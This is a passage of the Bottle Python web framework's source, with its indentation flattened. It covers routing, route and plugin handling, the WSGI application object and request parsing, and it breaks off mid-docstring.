# Exceptions and Events ########################################################
###############################################################################
class BottleException(Exception):
""" A base class for exceptions used by bottle. """
pass
###############################################################################
# Routing ######################################################################
###############################################################################
class RouteError(BottleException):
""" This is a base class for all routing related exceptions """
class RouteReset(BottleException):
""" If raised by a plugin or request handler, the route is reset and all
plugins are re-applied. """
class RouterUnknownModeError(RouteError): pass
class RouteSyntaxError(RouteError):
""" The route parser found something not supported by this router. """
class RouteBuildError(RouteError):
""" The route could not be built. """
def _re_flatten(p):
''' Turn all capturing groups in a regular expression pattern into
non-capturing groups. '''
if '(' not in p: return p
return re.sub(r'(\\*)(\(\?P<[^>]+>|\((?!\?))',
lambda m: m.group(0) if len(m.group(1)) % 2 else m.group(1) + '(?:', p)
class Router(object):
''' A Router is an ordered collection of route->target pairs. It is used to
efficiently match WSGI requests against a number of routes and return
the first target that satisfies the request. The target may be anything,
usually a string, ID or callable object. A route consists of a path-rule
and a HTTP method.
The path-rule is either a static path (e.g. `/contact`) or a dynamic
path that contains wildcards (e.g. `/wiki/<page>`). The wildcard syntax
and details on the matching order are described in docs:`routing`.
'''
default_pattern = '[^/]+'
default_filter = 're'
#: The current CPython regexp implementation does not allow more
#: than 99 matching groups per regular expression.
_MAX_GROUPS_PER_PATTERN = 99
def __init__(self, strict=False):
self.rules = [] # All rules in order
self._groups = {} # index of regexes to find them in dyna_routes
self.builder = {} # Data structure for the url builder
self.static = {} # Search structure for static routes
self.dyna_routes = {}
self.dyna_regexes = {} # Search structure for dynamic routes
#: If true, static routes are no longer checked first.
self.strict_order = strict
self.filters = {
're': lambda conf:
(_re_flatten(conf or self.default_pattern), None, None),
'int': lambda conf: (r'-?\d+', int, lambda x: str(int(x))),
'float': lambda conf: (r'-?[\d.]+', float, lambda x: str(float(x))),
'path': lambda conf: (r'.+?', None, None)}
def add_filter(self, name, func):
''' Add a filter. The provided function is called with the configuration
string as parameter and must return a (regexp, to_python, to_url) tuple.
The first element is a string, the last two are callables or None. '''
self.filters[name] = func
rule_syntax = re.compile('(\\\\*)'\
'(?:(?::([a-zA-Z_][a-zA-Z_0-9]*)?()(?:#(.*?)#)?)'\
'|(?:<([a-zA-Z_][a-zA-Z_0-9]*)?(?::([a-zA-Z_]*)'\
'(?::((?:\\\\.|[^\\\\>]+)+)?)?)?>))')
def _itertokens(self, rule):
offset, prefix = 0, ''
for match in self.rule_syntax.finditer(rule):
prefix += rule[offset:match.start()]
g = match.groups()
if len(g[0])%2: # Escaped wildcard
prefix += match.group(0)[len(g[0]):]
offset = match.end()
continue
if prefix:
yield prefix, None, None
name, filtr, conf = g[4:7] if g[2] is None else g[1:4]
yield name, filtr or 'default', conf or None
offset, prefix = match.end(), ''
if offset <= len(rule) or prefix:
yield prefix+rule[offset:], None, None
def add(self, rule, method, target, name=None):
''' Add a new rule or replace the target for an existing rule. '''
anons = 0 # Number of anonymous wildcards found
keys = [] # Names of keys
pattern = '' # Regular expression pattern with named groups
filters = [] # Lists of wildcard input filters
builder = [] # Data structure for the URL builder
is_static = True
for key, mode, conf in self._itertokens(rule):
if mode:
is_static = False
if mode == 'default': mode = self.default_filter
mask, in_filter, out_filter = self.filters[mode](conf)
if not key:
pattern += '(?:%s)' % mask
key = 'anon%d' % anons
anons += 1
else:
pattern += '(?P<%s>%s)' % (key, mask)
keys.append(key)
if in_filter: filters.append((key, in_filter))
builder.append((key, out_filter or str))
elif key:
pattern += re.escape(key)
builder.append((None, key))
self.builder[rule] = builder
if name: self.builder[name] = builder
if is_static and not self.strict_order:
self.static.setdefault(method, {})
self.static[method][self.build(rule)] = (target, None)
return
try:
re_pattern = re.compile('^(%s)$' % pattern)
re_match = re_pattern.match
except re.error:
raise RouteSyntaxError("Could not add Route: %s (%s)" % (rule, _e()))
if filters:
def getargs(path):
url_args = re_match(path).groupdict()
for name, wildcard_filter in filters:
try:
url_args[name] = wildcard_filter(url_args[name])
except ValueError:
raise HTTPError(400, 'Path has wrong format.')
return url_args
elif re_pattern.groupindex:
def getargs(path):
return re_match(path).groupdict()
else:
getargs = None
flatpat = _re_flatten(pattern)
whole_rule = (rule, flatpat, target, getargs)
if (flatpat, method) in self._groups:
if DEBUG:
msg = 'Route <%s %s> overwrites a previously defined route'
warnings.warn(msg % (method, rule), RuntimeWarning)
self.dyna_routes[method][self._groups[flatpat, method]] = whole_rule
else:
self.dyna_routes.setdefault(method, []).append(whole_rule)
self._groups[flatpat, method] = len(self.dyna_routes[method]) - 1
self._compile(method)
def _compile(self, method):
all_rules = self.dyna_routes[method]
comborules = self.dyna_regexes[method] = []
maxgroups = self._MAX_GROUPS_PER_PATTERN
for x in range(0, len(all_rules), maxgroups):
some = all_rules[x:x+maxgroups]
combined = (flatpat for (_, flatpat, _, _) in some)
combined = '|'.join('(^%s$)' % flatpat for flatpat in combined)
combined = re.compile(combined).match
rules = [(target, getargs) for (_, _, target, getargs) in some]
comborules.append((combined, rules))
def build(self, _name, *anons, **query):
''' Build an URL by filling the wildcards in a rule. '''
builder = self.builder.get(_name)
if not builder: raise RouteBuildError("No route with that name.", _name)
try:
for i, value in enumerate(anons): query['anon%d'%i] = value
url = ''.join([f(query.pop(n)) if n else f for (n,f) in builder])
return url if not query else url+'?'+urlencode(query)
except KeyError:
raise RouteBuildError('Missing URL argument: %r' % _e().args[0])
def match(self, environ):
''' Return a (target, url_agrs) tuple or raise HTTPError(400/404/405). '''
verb = environ['REQUEST_METHOD'].upper()
path = environ['PATH_INFO'] or '/'
target = None
methods = [verb, 'GET', 'ANY'] if verb == 'HEAD' else [verb, 'ANY']
for method in methods:
if method in self.static and path in self.static[method]:
target, getargs = self.static[method][path]
return target, getargs(path) if getargs else {}
elif method in self.dyna_regexes:
for combined, rules in self.dyna_regexes[method]:
match = combined(path)
if match:
target, getargs = rules[match.lastindex - 1]
return target, getargs(path) if getargs else {}
# No matching route found. Collect alternative methods for 405 response
allowed = set([])
nocheck = set(methods)
for method in set(self.static) - nocheck:
if path in self.static[method]:
allowed.add(verb)
for method in set(self.dyna_regexes) - allowed - nocheck:
for combined, rules in self.dyna_regexes[method]:
match = combined(path)
if match:
allowed.add(method)
if allowed:
allow_header = ",".join(sorted(allowed))
raise HTTPError(405, "Method not allowed.", Allow=allow_header)
# No matching route and no alternative method found. We give up
raise HTTPError(404, "Not found: " + repr(path))
class Route(object):
''' This class wraps a route callback along with route specific metadata and
configuration and applies Plugins on demand. It is also responsible for
turing an URL path rule into a regular expression usable by the Router.
'''
def __init__(self, app, rule, method, callback, name=None,
plugins=None, skiplist=None, **config):
#: The application this route is installed to.
self.app = app
#: The path-rule string (e.g. ``/wiki/:page``).
self.rule = rule
#: The HTTP method as a string (e.g. ``GET``).
self.method = method
#: The original callback with no plugins applied. Useful for introspection.
self.callback = callback
#: The name of the route (if specified) or ``None``.
self.name = name or None
#: A list of route-specific plugins (see :meth:`Bottle.route`).
self.plugins = plugins or []
#: A list of plugins to not apply to this route (see :meth:`Bottle.route`).
self.skiplist = skiplist or []
#: Additional keyword arguments passed to the :meth:`Bottle.route`
#: decorator are stored in this dictionary. Used for route-specific
#: plugin configuration and meta-data.
self.config = ConfigDict().load_dict(config)
@cached_property
def call(self):
''' The route callback with all plugins applied. This property is
created on demand and then cached to speed up subsequent requests.'''
return self._make_callback()
def reset(self):
''' Forget any cached values. The next time :attr:`call` is accessed,
all plugins are re-applied. '''
self.__dict__.pop('call', None)
def prepare(self):
''' Do all on-demand work immediately (useful for debugging).'''
self.call
def all_plugins(self):
''' Yield all Plugins affecting this route. '''
unique = set()
for p in reversed(self.app.plugins + self.plugins):
if True in self.skiplist: break
name = getattr(p, 'name', False)
if name and (name in self.skiplist or name in unique): continue
if p in self.skiplist or type(p) in self.skiplist: continue
if name: unique.add(name)
yield p
def _make_callback(self):
callback = self.callback
for plugin in self.all_plugins():
try:
if hasattr(plugin, 'apply'):
callback = plugin.apply(callback, self)
else:
callback = plugin(callback)
except RouteReset: # Try again with changed configuration.
return self._make_callback()
if not callback is self.callback:
update_wrapper(callback, self.callback)
return callback
def get_undecorated_callback(self):
''' Return the callback. If the callback is a decorated function, try to
recover the original function. '''
func = self.callback
func = getattr(func, '__func__' if py3k else 'im_func', func)
closure_attr = '__closure__' if py3k else 'func_closure'
while hasattr(func, closure_attr) and getattr(func, closure_attr):
func = getattr(func, closure_attr)[0].cell_contents
return func
def get_callback_args(self):
''' Return a list of argument names the callback (most likely) accepts
as keyword arguments. If the callback is a decorated function, try
to recover the original function before inspection. '''
return getargspec(self.get_undecorated_callback())[0]
def get_config(self, key, default=None):
''' Lookup a config field and return its value, first checking the
route.config, then route.app.config.'''
for conf in (self.config, self.app.conifg):
if key in conf:
return conf[key]
return default
def __repr__(self):
cb = self.get_undecorated_callback()
return '<%s %r %r>' % (self.method, self.rule, cb)
###############################################################################
# Application Object ###########################################################
###############################################################################
class Bottle(object):
""" Each Bottle object represents a single, distinct web application and
consists of routes, callbacks, plugins, resources and configuration.
Instances are callable WSGI applications.
:param catchall: If true (default), handle all exceptions. Turn off to
let debugging middleware handle exceptions.
"""
def __init__(self, catchall=True, autojson=True):
#: A :class:`ConfigDict` for app specific configuration.
self.config = ConfigDict()
self.config._on_change = functools.partial(self.trigger_hook, 'config')
self.config.meta_set('autojson', 'validate', bool)
self.config.meta_set('catchall', 'validate', bool)
self.config['catchall'] = catchall
self.config['autojson'] = autojson
#: A :class:`ResourceManager` for application files
self.resources = ResourceManager()
self.routes = [] # List of installed :class:`Route` instances.
self.router = Router() # Maps requests to :class:`Route` instances.
self.error_handler = {}
# Core plugins
self.plugins = [] # List of installed plugins.
if self.config['autojson']:
self.install(JSONPlugin())
self.install(TemplatePlugin())
#: If true, most exceptions are caught and returned as :exc:`HTTPError`
catchall = DictProperty('config', 'catchall')
__hook_names = 'before_request', 'after_request', 'app_reset', 'config'
__hook_reversed = 'after_request'
@cached_property
def _hooks(self):
return dict((name, []) for name in self.__hook_names)
def add_hook(self, name, func):
''' Attach a callback to a hook. Three hooks are currently implemented:
before_request
Executed once before each request. The request context is
available, but no routing has happened yet.
after_request
Executed once after each request regardless of its outcome.
app_reset
Called whenever :meth:`Bottle.reset` is called.
'''
if name in self.__hook_reversed:
self._hooks[name].insert(0, func)
else:
self._hooks[name].append(func)
def remove_hook(self, name, func):
''' Remove a callback from a hook. '''
if name in self._hooks and func in self._hooks[name]:
self._hooks[name].remove(func)
return True
def trigger_hook(self, __name, *args, **kwargs):
''' Trigger a hook and return a list of results. '''
return [hook(*args, **kwargs) for hook in self._hooks[__name][:]]
def hook(self, name):
""" Return a decorator that attaches a callback to a hook. See
:meth:`add_hook` for details."""
def decorator(func):
self.add_hook(name, func)
return func
return decorator
def mount(self, prefix, app, **options):
''' Mount an application (:class:`Bottle` or plain WSGI) to a specific
URL prefix. Example::
root_app.mount('/admin/', admin_app)
:param prefix: path prefix or `mount-point`. If it ends in a slash,
that slash is mandatory.
:param app: an instance of :class:`Bottle` or a WSGI application.
All other parameters are passed to the underlying :meth:`route` call.
'''
segments = [p for p in prefix.split('/') if p]
if not segments: raise ValueError('Empty path prefix.')
path_depth = len(segments)
def mountpoint_wrapper():
try:
request.path_shift(path_depth)
rs = HTTPResponse([])
def start_response(status, headerlist, exc_info=None):
if exc_info:
try:
_raise(*exc_info)
finally:
exc_info = None
rs.status = status
for name, value in headerlist: rs.add_header(name, value)
return rs.body.append
body = app(request.environ, start_response)
if body and rs.body: body = itertools.chain(rs.body, body)
rs.body = body or rs.body
return rs
finally:
request.path_shift(-path_depth)
options.setdefault('skip', True)
options.setdefault('method', 'ANY')
options.setdefault('mountpoint', {'prefix': prefix, 'target': app})
options['callback'] = mountpoint_wrapper
self.route('/%s/<:re:.*>' % '/'.join(segments), **options)
if not prefix.endswith('/'):
self.route('/' + '/'.join(segments), **options)
def merge(self, routes):
''' Merge the routes of another :class:`Bottle` application or a list of
:class:`Route` objects into this application. The routes keep their
'owner', meaning that the :data:`Route.app` attribute is not
changed. '''
if isinstance(routes, Bottle):
routes = routes.routes
for route in routes:
self.add_route(route)
def install(self, plugin):
''' Add a plugin to the list of plugins and prepare it for being
applied to all routes of this application. A plugin may be a simple
decorator or an object that implements the :class:`Plugin` API.
'''
if hasattr(plugin, 'setup'): plugin.setup(self)
if not callable(plugin) and not hasattr(plugin, 'apply'):
raise TypeError("Plugins must be callable or implement .apply()")
self.plugins.append(plugin)
self.reset()
return plugin
def uninstall(self, plugin):
''' Uninstall plugins. Pass an instance to remove a specific plugin, a type
object to remove all plugins that match that type, a string to remove
all plugins with a matching ``name`` attribute or ``True`` to remove all
plugins. Return the list of removed plugins. '''
removed, remove = [], plugin
for i, plugin in list(enumerate(self.plugins))[::-1]:
if remove is True or remove is plugin or remove is type(plugin) \
or getattr(plugin, 'name', True) == remove:
removed.append(plugin)
del self.plugins[i]
if hasattr(plugin, 'close'): plugin.close()
if removed: self.reset()
return removed
def reset(self, route=None):
''' Reset all routes (force plugins to be re-applied) and clear all
caches. If an ID or route object is given, only that specific route
is affected. '''
if route is None: routes = self.routes
elif isinstance(route, Route): routes = [route]
else: routes = [self.routes[route]]
for route in routes: route.reset()
if DEBUG:
for route in routes: route.prepare()
self.trigger_hook('app_reset')
def close(self):
''' Close the application and all installed plugins. '''
for plugin in self.plugins:
if hasattr(plugin, 'close'): plugin.close()
self.stopped = True
def run(self, **kwargs):
''' Calls :func:`run` with the same parameters. '''
run(self, **kwargs)
def match(self, environ):
""" Search for a matching route and return a (:class:`Route` , urlargs)
tuple. The second value is a dictionary with parameters extracted
from the URL. Raise :exc:`HTTPError` (404/405) on a non-match."""
return self.router.match(environ)
def get_url(self, routename, **kargs):
""" Return a string that matches a named route """
scriptname = request.environ.get('SCRIPT_NAME', '').strip('/') + '/'
location = self.router.build(routename, **kargs).lstrip('/')
return urljoin(urljoin('/', scriptname), location)
def add_route(self, route):
''' Add a route object, but do not change the :data:`Route.app`
attribute.'''
self.routes.append(route)
self.router.add(route.rule, route.method, route, name=route.name)
if DEBUG: route.prepare()
def route(self, path=None, method='GET', callback=None, name=None,
apply=None, skip=None, **config):
""" A decorator to bind a function to a request URL. Example::
@app.route('/hello/:name')
def hello(name):
return 'Hello %s' % name
The ``:name`` part is a wildcard. See :class:`Router` for syntax
details.
:param path: Request path or a list of paths to listen to. If no
path is specified, it is automatically generated from the
signature of the function.
:param method: HTTP method (`GET`, `POST`, `PUT`, ...) or a list of
methods to listen to. (default: `GET`)
:param callback: An optional shortcut to avoid the decorator
syntax. ``route(..., callback=func)`` equals ``route(...)(func)``
:param name: The name for this route. (default: None)
:param apply: A decorator or plugin or a list of plugins. These are
applied to the route callback in addition to installed plugins.
:param skip: A list of plugins, plugin classes or names. Matching
plugins are not installed to this route. ``True`` skips all.
Any additional keyword arguments are stored as route-specific
configuration and passed to plugins (see :meth:`Plugin.apply`).
"""
if callable(path): path, callback = None, path
plugins = makelist(apply)
skiplist = makelist(skip)
def decorator(callback):
# TODO: Documentation and tests
if isinstance(callback, basestring): callback = load(callback)
for rule in makelist(path) or yieldroutes(callback):
for verb in makelist(method):
verb = verb.upper()
route = Route(self, rule, verb, callback, name=name,
plugins=plugins, skiplist=skiplist, **config)
self.add_route(route)
return callback
return decorator(callback) if callback else decorator
def get(self, path=None, method='GET', **options):
""" Equals :meth:`route`. """
return self.route(path, method, **options)
def post(self, path=None, method='POST', **options):
""" Equals :meth:`route` with a ``POST`` method parameter. """
return self.route(path, method, **options)
def put(self, path=None, method='PUT', **options):
""" Equals :meth:`route` with a ``PUT`` method parameter. """
return self.route(path, method, **options)
def delete(self, path=None, method='DELETE', **options):
""" Equals :meth:`route` with a ``DELETE`` method parameter. """
return self.route(path, method, **options)
def error(self, code=500):
""" Decorator: Register an output handler for a HTTP error code"""
def wrapper(handler):
self.error_handler[int(code)] = handler
return handler
return wrapper
def default_error_handler(self, res):
return tob(template(ERROR_PAGE_TEMPLATE, e=res))
def _handle(self, environ):
path = environ['bottle.raw_path'] = environ['PATH_INFO']
if py3k:
try:
environ['PATH_INFO'] = path.encode('latin1').decode('utf8')
except UnicodeError:
return HTTPError(400, 'Invalid path string. Expected UTF-8')
try:
environ['bottle.app'] = self
request.bind(environ)
response.bind()
try:
self.trigger_hook('before_request')
route, args = self.router.match(environ)
environ['route.handle'] = route
environ['bottle.route'] = route
environ['route.url_args'] = args
return route.call(**args)
finally:
self.trigger_hook('after_request')
except HTTPResponse:
return _e()
except RouteReset:
route.reset()
return self._handle(environ)
except (KeyboardInterrupt, SystemExit, MemoryError):
raise
except Exception:
if not self.catchall: raise
stacktrace = format_exc()
environ['wsgi.errors'].write(stacktrace)
return HTTPError(500, "Internal Server Error", _e(), stacktrace)
def _cast(self, out, peek=None):
""" Try to convert the parameter into something WSGI compatible and set
correct HTTP headers when possible.
Support: False, str, unicode, dict, HTTPResponse, HTTPError, file-like,
iterable of strings and iterable of unicodes
"""
# Empty output is done here
if not out:
if 'Content-Length' not in response:
response['Content-Length'] = 0
return []
# Join lists of byte or unicode strings. Mixed lists are NOT supported
if isinstance(out, (tuple, list))\
and isinstance(out[0], (bytes, unicode)):
out = out[0][0:0].join(out) # b'abc'[0:0] -> b''
# Encode unicode strings
if isinstance(out, unicode):
out = out.encode(response.charset)
# Byte Strings are just returned
if isinstance(out, bytes):
if 'Content-Length' not in response:
response['Content-Length'] = len(out)
return [out]
# HTTPError or HTTPException (recursive, because they may wrap anything)
# TODO: Handle these explicitly in handle() or make them iterable.
if isinstance(out, HTTPError):
out.apply(response)
out = self.error_handler.get(out.status_code, self.default_error_handler)(out)
return self._cast(out)
if isinstance(out, HTTPResponse):
out.apply(response)
return self._cast(out.body)
# File-like objects.
if hasattr(out, 'read'):
if 'wsgi.file_wrapper' in request.environ:
return request.environ['wsgi.file_wrapper'](out)
elif hasattr(out, 'close') or not hasattr(out, '__iter__'):
return WSGIFileWrapper(out)
# Handle Iterables. We peek into them to detect their inner type.
try:
iout = iter(out)
first = next(iout)
while not first:
first = next(iout)
except StopIteration:
return self._cast('')
except HTTPResponse:
first = _e()
except (KeyboardInterrupt, SystemExit, MemoryError):
raise
except Exception:
if not self.catchall: raise
first = HTTPError(500, 'Unhandled exception', _e(), format_exc())
# These are the inner types allowed in iterator or generator objects.
if isinstance(first, HTTPResponse):
return self._cast(first)
elif isinstance(first, bytes):
new_iter = itertools.chain([first], iout)
elif isinstance(first, unicode):
encoder = lambda x: x.encode(response.charset)
new_iter = imap(encoder, itertools.chain([first], iout))
else:
msg = 'Unsupported response type: %s' % type(first)
return self._cast(HTTPError(500, msg))
if hasattr(out, 'close'):
new_iter = _closeiter(new_iter, out.close)
return new_iter
def wsgi(self, environ, start_response):
""" The bottle WSGI-interface. """
try:
out = self._cast(self._handle(environ))
# rfc2616 section 4.3
if response._status_code in (100, 101, 204, 304)\
or environ['REQUEST_METHOD'] == 'HEAD':
if hasattr(out, 'close'): out.close()
out = []
start_response(response._status_line, response.headerlist)
return out
except (KeyboardInterrupt, SystemExit, MemoryError):
raise
except Exception:
if not self.catchall: raise
err = '<h1>Critical error while processing request: %s</h1>' \
% html_escape(environ.get('PATH_INFO', '/'))
if DEBUG:
err += '<h2>Error:</h2>\n<pre>\n%s\n</pre>\n' \
'<h2>Traceback:</h2>\n<pre>\n%s\n</pre>\n' \
% (html_escape(repr(_e())), html_escape(format_exc()))
environ['wsgi.errors'].write(err)
headers = [('Content-Type', 'text/html; charset=UTF-8')]
start_response('500 INTERNAL SERVER ERROR', headers, sys.exc_info())
return [tob(err)]
def __call__(self, environ, start_response):
''' Each instance of :class:'Bottle' is a WSGI application. '''
return self.wsgi(environ, start_response)
def __enter__(self):
''' Use this application as default for all module-level shortcuts. '''
default_app.push(self)
return self
def __exit__(self, exc_type, exc_value, traceback):
default_app.pop()
###############################################################################
# HTTP and WSGI Tools ##########################################################
###############################################################################
class BaseRequest(object):
""" A wrapper for WSGI environment dictionaries that adds a lot of
convenient access methods and properties. Most of them are read-only.
Adding new attributes to a request actually adds them to the environ
dictionary (as 'bottle.request.ext.<name>'). This is the recommended
way to store and access request-specific data.
"""
__slots__ = ('environ')
#: Maximum size of memory buffer for :attr:`body` in bytes.
MEMFILE_MAX = 102400
def __init__(self, environ=None):
""" Wrap a WSGI environ dictionary. """
#: The wrapped WSGI environ dictionary. This is the only real attribute.
#: All other attributes actually are read-only properties.
self.environ = {} if environ is None else environ
self.environ['bottle.request'] = self
@DictProperty('environ', 'bottle.app', read_only=True)
def app(self):
''' Bottle application handling this request. '''
raise RuntimeError('This request is not connected to an application.')
@DictProperty('environ', 'bottle.route', read_only=True)
def route(self):
""" The bottle :class:`Route` object that matches this request. """
raise RuntimeError('This request is not connected to a route.')
@DictProperty('environ', 'route.url_args', read_only=True)
def url_args(self):
""" The arguments extracted from the URL. """
raise RuntimeError('This request is not connected to a route.')
@property
def path(self):
''' The value of ``PATH_INFO`` with exactly one prefixed slash (to fix
broken clients and avoid the "empty path" edge case). '''
return '/' + self.environ.get('PATH_INFO','').lstrip('/')
@property
def method(self):
''' The ``REQUEST_METHOD`` value as an uppercase string. '''
return self.environ.get('REQUEST_METHOD', 'GET').upper()
@DictProperty('environ', 'bottle.request.headers', read_only=True)
def headers(self):
''' A :class:`WSGIHeaderDict` that provides case-insensitive access to
HTTP request headers. '''
return WSGIHeaderDict(self.environ)
def get_header(self, name, default=None):
''' Return the value of a request header, or a given default value. '''
return self.headers.get(name, default)
@DictProperty('environ', 'bottle.request.cookies', read_only=True)
def cookies(self):
""" Cookies parsed into a :class:`FormsDict`. Signed cookies are NOT
decoded. Use :meth:`get_cookie` if you expect signed cookies. """
cookies = SimpleCookie(self.environ.get('HTTP_COOKIE','')).values()
return FormsDict((c.key, c.value) for c in cookies)
def get_cookie(self, key, default=None, secret=None):
""" Return the content of a cookie. To read a `Signed Cookie`, the
`secret` must match the one used to create the cookie (see
:meth:`BaseResponse.set_cookie`). If anything goes wrong (missing
cookie or wrong signature), return a default value. """
value = self.cookies.get(key)
if secret and value:
dec = cookie_decode(value, secret) # (key, value) tuple or None
return dec[1] if dec and dec[0] == key else default
return value or default
@DictProperty('environ', 'bottle.request.query', read_only=True)
def query(self):
''' The :attr:`query_string` parsed into a :class:`FormsDict`. These
values are sometimes called "URL arguments" or "GET parameters", but
not to be confused with "URL wildcards" as they are provided by the
:class:`Router`. '''
get = self.environ['bottle.get'] = FormsDict()
pairs = _parse_qsl(self.environ.get('QUERY_STRING', ''))
for key, value in pairs:
get[key] = value
return get
@DictProperty('environ', 'bottle.request.forms', read_only=True)
def forms(self):
""" Form values parsed from an `url-encoded` or `multipart/form-data`
encoded POST or PUT request body. The result is returned as a
:class:`FormsDict`. All keys and values are strings. File uploads
are stored separately in :attr:`files`. """
forms = FormsDict()
for name, item in self.POST.allitems():
if not isinstance(item, FileUpload):
forms[name] = item
return forms
@DictProperty('environ', 'bottle.request.params', read_only=True)
def params(self):
""" A :class:`FormsDict` with the combined values of :attr:`query` and
:attr:`forms`. File uploads are stored in :attr:`files`. """
params = FormsDict()
for key, value in self.query.allitems():
params[key] = value
for key, value in self.forms.allitems():
params[key] = value
return params
@DictProperty('environ', 'bottle.request.files', read_only=True)
def files(self):
""" File uploads parsed from `multipart/form-data` encoded POST or PUT
request body. The values are instances of :class:`FileUpload`.
"""
files = FormsDict()
for name, item in self.POST.allitems():
if isinstance(item, FileUpload):
files[name] = item
return files
@DictProperty('environ', 'bottle.request.json', read_only=True)
def json(self):
''' If the ``Content-Type`` header is ``application/json``, this
property holds the parsed content of the request body. Only requests
smaller than :attr:`MEMFILE_MAX` are processed to avoid memory
exhaustion. '''
if 'application/json' in self.environ.get('CONTENT_TYPE', ''):
return json_loads(self._get_body_string())
return None
def _iter_body(self, read, bufsize):
maxread = max(0, self.content_length)
while maxread:
part = read(min(maxread, bufsize))
if not part: break
yield part
maxread -= len(part)
def _iter_chunked(self, read, bufsize):
err = HTTPError(400, 'Error while parsing chunked transfer body.')
rn, sem, bs = tob('\r\n'), tob(';'), tob('')
while True:
header = read(1)
while header[-2:] != rn:
c = read(1)
header += c
if not c: raise err
if len(header) > bufsize: raise err
size, sep, junk = header.partition(sem)
try:
maxread = int(tonat(size.strip()), 16)
except ValueError:
raise err
if maxread == 0: break
buffer = bs
while maxread > 0:
if not buffer:
buffer = read(min(maxread, bufsize))
part, buffer = buffer[:maxread], buffer[maxread:]
if not part: raise err
yield part
maxread -= len(part)
if read(2) != rn:
raise err
@DictProperty('environ', 'bottle.request.body', read_only=True)
def _body(self):
body_iter = self._iter_chunked if self.chunked else self._iter_body
read_func = self.environ['wsgi.input'].read
body, body_size, is_temp_file = BytesIO(), 0, False
for part in body_iter(read_func, self.MEMFILE_MAX):
body.write(part)
body_size += len(part)
if not is_temp_file and body_size > self.MEMFILE_MAX:
body, tmp = TemporaryFile(mode='w+b'), body
body.write(tmp.getvalue())
del tmp
is_temp_file = True
self.environ['wsgi.input'] = body
body.seek(0)
return body
def _get_body_string(self):
''' read body until content-length or MEMFILE_MAX into a string. Raise
HTTPError(413) on requests that are to large. '''
clen = self.content_length
if clen > self.MEMFILE_MAX:
raise HTTPError(413, 'Request to large')
if clen < 0: clen = self.MEMFILE_MAX + 1
data = self.body.read(clen)
if len(data) > self.MEMFILE_MAX: # Fail fast
raise HTTPError(413, 'Request to large')
return data
@property
def body(self):
""" The HTTP request body as a seek-able file-like object. Depending on
:attr:`MEMFILE_MAX`, this is either a temporary file or a
:class:`io.BytesIO` instance. Accessing this property for the first
time reads and replaces the ``wsgi.input`` environ variable.
Subsequent accesses just do a `seek(0)` on the file object. """
self._body.seek(0)
return self._body
@property
def chunked(self):
''' True if Chunked transfer encoding was. '''
return 'chunked' in self.environ.get('HTTP_TRANSFER_ENCODING', '').lower()
#: An alias for :attr:`query`.
GET = query
@DictProperty('environ', 'bottle.request.post', read_only=True)
def POST(self):
""" The values of :attr:`forms` and :attr:`files` combined into a single
:class:`FormsDict`. Values are either strings (form values) or
instances of :class:`cgi.FieldStorage` (file uploads).
"""
post = FormsDict()
# We default to application/x-www-form-urlencoded for everything that
# is not multipart and take the fast path (also: 3.1 workaround)
if not self.content_type.startswith('multipart/'):
pairs = _parse_qsl(tonat(self._get_body_string(), 'latin1'))
for key, value in pairs:
post[key] = value
return post
safe_env = {'QUERY_STRING':''} # Build a safe environment for cgi
for key in ('REQUEST_METHOD', 'CONTENT_TYPE', 'CONTENT_LENGTH'):
if key in self.environ: safe_env[key] = self.environ[key]
args = dict(fp=self.body, environ=safe_env, keep_blank_values=True)
if py31:
args['fp'] = NCTextIOWrapper(args['fp'], encoding='utf8',
newline='\n')
elif py3k:
args['encoding'] = 'utf8'
data = cgi.FieldStorage(**args)
data = data.list or []
for item in data:
if item.filename:
post[item.name] = FileUpload(item.file, item.name,
item.filename, item.headers)
else:
post[item.name] = item.value
return post
@property
def url(self):
""" The full request URI including hostname and scheme. If your app
lives behind a reverse proxy or load balancer and you get confusing
results, make sure that the ``X-Forwarded-Host`` header is set
correctly. """
return self.urlparts.geturl()
@DictProperty('environ', 'bottle.request.urlparts', read_only=True)
def urlparts(self):
''' The :attr:`url` string as an :class:`urlparse.SplitResult` tuple.
The tuple contains (scheme, host, path, query_string and fragment),
but the fragment is always empty because it is not visible to the
server. '''
env = self.environ
http = env.get('HTTP_X_FORWARDED_PROTO') or env.get('wsgi.url_scheme', 'http')
host = env.get('HTTP_X_FORWARDED_HOST') or env.get('HTTP_HOST')
if not host:
# HTTP 1.1 requires a Host-header. This is for HTTP/1.0 clients.
host = env.get('SERVER_NAME', '127.0.0.1')
port = env.get('SERVER_PORT')
if port and port != ('80' if http == 'http' else '443'):
host += ':' + port
path = urlquote(self.fullpath)
return UrlSplitResult(http, host, path, env.get('QUERY_STRING'), '')
@property
def fullpath(self):
""" Request path including :attr:`script_name` (if present). """
return urljoin(self.script_name, self.path.lstrip('/'))
@property
def query_string(self):
""" The raw :attr:`query` part of the URL (everything in between ``?``
and ``#``) as a string. """
return self.environ.get('QUERY_STRING', '')
@property
def script_name(self):
''' The initial portion of the URL's `path` that was removed by a higher
level (server or routing middleware) before the application was
called. This script path is returned with leading and tailing
slashes. '''
script_name = self.environ.get('SCRIPT_NAME', '').strip('/')
return '/' + script_name + '/' if script_name else '/'
def path_shift(self, shift=1):
''' Shift path segments from :attr:`path` to :attr:`script_name` and
vice versa.
:param shift: The number of path segments to shift. May be negative
to change the shift direction. (default: 1)
'''
script = self.environ.get('SCRIPT_NAME','/')
self['SCRIPT_NAME'], self['PATH_INFO'] = path_shift(script, self.path, shift)
@property
def content_length(self):
''' The request body length as an integer. The client is responsible to
set this header. Otherwise, the real length of the body is unknown
and -1 is returned. In this case, :attr:`body` will be empty. '''
return int(self.environ.get('CONTENT_LENGTH') or -1)
@property
def content_type(self):
''' The Content-Type header as a lowercase-string (default: empty). '''
return self.environ.get('CONTENT_TYPE', '').lower()
@property
def is_xhr(self):
''' True if the request was triggered by a XMLHttpRequest. This only
works with JavaScript libraries that support the `X-Requested-With`
header (most of the popular libraries do). '''
requested_with = self.environ.get('HTTP_X_REQUESTED_WITH','')
return requested_with.lower() == 'xmlhttprequest'
@property
def is_ajax(self):
''' Alias for :attr:`is_xhr`. "Ajax" is not the right term. '''
return self.is_xhr
@property
def auth(self):
""" HTTP authentication data as a (user, password) tuple. This
implementation currently supports basic (not digest) authentication
only. If the authentication happened at a higher level (e.g. in the
front web-server or a middleware), the password field is None, but
the user field is looked up from the ``REMOTE_USER`` environ
variable. On any errors, None is returned. """
basic = parse_auth(self.environ.get('HTTP_AUTHORIZATION',''))
if basic: return basic
ruser = self.environ.get('REMOTE_USER')
if ruser: return (ruser, None)
return None
@property
def remote_route(self):
""" A list of all IPs that were involved in this request, starting with
the client IP and followed by zero or more proxies. This does only
